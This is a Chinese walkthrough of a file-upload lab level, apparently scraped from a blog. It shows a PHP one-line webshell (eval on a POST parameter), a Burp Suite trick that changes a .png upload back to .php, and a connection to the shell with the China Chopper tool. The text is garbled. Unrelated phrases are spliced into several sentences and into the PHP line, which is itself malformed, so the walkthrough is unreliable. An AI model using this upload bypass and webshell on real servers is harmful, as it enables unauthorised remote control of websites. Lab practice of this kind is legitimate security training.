后续关卡
首先,打开靶场,进入第一关
然后先上传一个正常的图片,测试一下靶场安装是否正常
那再上传一个php文件试试。提示不行,只能激励别人的话上传jpg、png、gif类型的文件,说明这一关考的是限制放鞭炮的图片文件上传的类型
那就用php(用其他语言写也行)写个一句话木马,然后将文件后缀改为png之类的
<?phpeval($_POST['123']);//或者eval($_GET['123课题研究报告']);//123是密码,等下会用到,随便取什么值都行?>
点上传文件之前,先给浏览器设置个代理服务器
然后在burp suite里抓包
把文件后缀从png改回php,再发送给服务器
右击刚刚上传的图片,啥都看不到是正常的
选择属性,找到刚刚上传的图片路径地址
在菜刀里找个空白的地方,右击鼠标,选择添加
滚来滚去的小土豆添加好了之后,就会在第一行出现记录
点击与人沟通的技巧它,就能连接后台了
本文地址:https://blog.csdn.net/weixin_45663905/article/details/107528614
本文发布于:2023-04-08 20:48:46,感谢您对本站的认可!
本文链接:https://www.wtabcd.cn/fanwen/zuowen/49fa4908643214c12b3997e17e83a345.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文word下载地址:upload.doc
本文 PDF 下载地址:upload.pdf
留言与评论(共有 0 条评论) |